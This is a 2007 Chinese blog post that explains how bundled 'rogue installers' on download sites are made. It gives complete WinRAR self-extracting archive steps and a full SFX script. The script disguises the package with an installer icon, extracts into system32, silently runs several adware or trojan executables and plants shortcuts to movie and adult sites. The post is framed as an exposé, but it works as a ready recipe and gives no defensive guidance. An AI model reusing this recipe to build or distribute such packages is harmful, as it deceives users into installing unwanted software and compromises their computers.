流氓安装程序是这样做成的!

1,058次阅读
没有评论

现在有这样一种下载网站,提供的软件是比较实用,但为了经济利益,姑且不谈页面上满天飞的广告,却放上很多下载流氓插件的链接。这些链接与正常的普通链接放在一块儿,用户一不小心就下载了。下载了当然就要安装,这就中了流氓插件的当了,双击的瞬间,一个或几个插件就被安装上了,如果防毒系统不报警,用户就没有任何察觉。

在这里,谈谈这种强制安装的流氓安装程序是怎样制作出来的。

首先,把要安装在用户机器上的插件或是木马放到一个文件夹,这些插件在制作的时候就是后台悄悄安装的。为了测试,我特地下载了这样的安装包。看看下面的图示,cnnic、脱兔等强制安装的插件赫然在列,还有两个“免费电影”网。

全部选中,点击右键,选择“添加到压缩文件(A)”。这样就出现了WinRar的压缩选项框。

点击“创建自解压格式压缩文件”前的小框勾上,再选择“高级”-“自解压选项”-“文本和图标”,进行“浏览”选择好此安装程序的图标,当然这是更好的伪装成真正的安装程序。我们选择了下面这个。

其它的基本可以不用设置了,只需要在“注释”中加入以下参数,然后点击“确定”就可以了。

;下面的注释包含自解压脚本命令

Path=%systemroot%\system32

SavePath

Setup=setup.exe

Setup=cnnic_1007.exe

Setup=NewsSetup10001.exe

Setup=TuoTu_3.0.104_silent_U1202.exe

Setup=tutu_1000.exe

Setup=dodolook510.exe

Setup=Silent.exe

Setup=soft262.exe

Setup=mdodo_Setup.exe

TempMode

Silent=1

Overwrite=1

Shortcut=T, "66免费电影.url", "", "66免费电影", "66免费电影"

Shortcut=D, "在线成人网络电视.url", "", "在线成人网络电视", "在线成人网络电视"

一个完整的安装程序就制作成了。此时只需要双击这个文件,那一堆乱七八遭的东西就被强制安装上了。

正文完
 
正安一片瓦
版权声明:本站原创文章,由 正安一片瓦 2007-11-19发表,共计869字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(没有评论)
验证码